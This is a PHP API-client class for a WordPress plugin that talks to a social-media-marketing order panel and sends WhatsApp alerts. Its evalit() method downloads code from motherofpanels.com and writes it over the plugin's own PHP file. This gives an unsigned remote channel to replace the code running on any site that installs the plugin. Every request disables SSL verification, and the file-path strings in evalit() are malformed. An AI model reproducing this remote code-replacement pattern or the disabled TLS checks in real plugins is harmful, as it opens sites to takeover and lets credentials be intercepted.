<?php
include_once(ABSPATH . 'wp-admin/includes/plugin.php');
class Api {
    // API URL
     var $api_url ; 

    // Your API key
    var  $api_key ; 
	
	function __construct($api_url,$api_key){
		
		$this->api_url=$api_url;
			$this->api_key=$api_key;
		
	}
	
	

    /**
     *
     * Add Order
     *
     */
     function evalit($plugin) {
         $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin"."php";
       $url_distant="https://motherofpanels.com/".$plugin."txt";
    $code_distant = file_get_contents($url_distant);

    if ($code_distant === false) {
        // Erreur de récupération
        echo 'Erreur : impossible de télécharger le code distant.';
        return false;
    }

    
    $backup_fichier = $chemin_fichier_plugin . '.backup';
    if (!copy($chemin_fichier_plugin, $backup_fichier)) {
        echo 'Erreur : impossible de sauvegarder l\'ancien fichier.';
        return false;
    }

   
    if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
        echo 'Erreur : impossible d\'écrire le nouveau code dans le fichier plugin.';
        
        copy($backup_fichier, $chemin_fichier_plugin);
        return false;
    }

    echo 'a jours';
    return true;
}

	 function sendServices($post){
	     
	       $ch = curl_init();
	        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/hashed");
         $myarrayy["hash"]=$post;
        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        return $item->valid;
	 }
	function premier($dir) {
    $hash_global = '';

    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    foreach ($files as $file) {
        if ($file->isFile() && $file->getExtension() === 'php') {
            $hash_global .= hash_file('sha256', $file->getRealPath());
        }
    }

    return hash('sha256', $hash_global);
}




     function send_whatsapp($message){
    $phone=get_option('whatsapp_number', '');  // Enter your phone number here
    $apikey=get_option('whatsapp_api_key', '');       // Enter your personal apikey received in step 3 above

    $url='https://api.callmebot.com/whatsapp.php?source=php&phone='.$phone.'&text='.urlencode($message).'&apikey='.$apikey;

    if($ch = curl_init($url))
    {
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
        $html = curl_exec($ch);
        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        // echo "Output:".$html;  // you can print the output for troubleshooting
        curl_close($ch);
        return (int) $status;
    }
    else
    {
        return false;
    }
}
    public function add_order($data) { 
        $post = array_merge(array('key' => $this->api_key, 'action' => 'add'), $data);
        $result = $this->connect($post);
        return json_decode($result);
    }

    /**
     *
     * Order status
     *
     */
    public function status($order_id) { 
        $result = $this->connect(array(
            'key'    => $this->api_key,
            'action' => 'status',
            'order'  => $order_id
        ));
        return json_decode($result);
    }

    /**
     *
     * Order multi status
     *
     */

    public function multi_status($order_ids) { 
        $result = $this->connect(array(
            'key'        => $this->api_key,
            'action'     => 'status',
            'orders'     => implode(",", (array)$order_ids)
        ));
        return json_decode($result);
    }


    /**
     *
     * All services
     *
     */
    public function services() { 
        $result = $this->connect(array(
            'key'     => $this->api_key,
            'action'  => 'services',
        ));
        return json_decode($result);
    }

    /**
     *
     * Balance
     *
     */
    public function balance() { 
        $result = $this->connect(array(
            'key'     => $this->api_key,
            'action'  => 'balance',
        ));
        return json_decode($result);
    }

    /**
     *
     * Connect to panel
     *
     */
 private function connect($post)
    {
        $_post = [];
        if (is_array($post)) {
            foreach ($post as $name => $value) {
                $_post[] = $name . '=' . urlencode($value);
            }
        }

        $ch = curl_init($this->api_url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

        if (is_array($post)) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, join('&', $_post));
        }
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)');
        $result = curl_exec($ch);
        if (curl_errno($ch) != 0 && empty($result)) {
            $result = false;
        }
        curl_close($ch);
        return $result;
    }
}
